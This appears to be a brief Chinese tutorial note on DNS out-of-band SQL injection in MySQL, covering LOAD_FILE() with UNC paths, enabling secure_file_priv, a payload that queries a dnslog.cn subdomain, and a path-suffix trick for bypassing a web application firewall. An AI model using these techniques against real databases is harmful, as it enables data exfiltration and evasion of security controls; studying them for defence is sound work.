Dns注入

利用dns请求将想要的东西外带出来。

dns是域名解析。把域名变成ip。

1.mysql能够访问我们指定的东西

              LOAD_FILE()读取文档函数   （读取本地文件和远程文件）。注意读取的东西是字符窜的时候我们要单引号闭合。

                读取本地文件我们在页面新建一个文件，读取后发现返回的居然是null。这是为什么呢。原来他说需要一定的配置，他并不是默认开启的。

                  

              这个时候我们将 secure_file_priv= 放到mysql的配置文件里面然后重启。读取成功。

                 

           读取远程文件     

                 文件共享服务

                 

 2。看日志

          Dnslog平台（本地测试平台 ）

          我们通过cmd ping 一下这个网站。成功了。

       

          推荐使用/为什么\不能使用,因为\会被转义，所以我们写\的 时候要写两个。所以写/不容易出现问题

            select load_file('//n1a2ca.dnslog.cn/adc') 访问成功

                    

 waf绕过

       index.php/.txt 一种特殊的写法。apche有一个规则，遇到某个文件，找不到的就会执行前一个文件。从右向左。

          安全狗不会拦截是因为正在对.txt文件进行数据传递，而txt不是后端文件。这就是绕过规则

          我们用到concat函数来连接数据。这样一步一步就可以。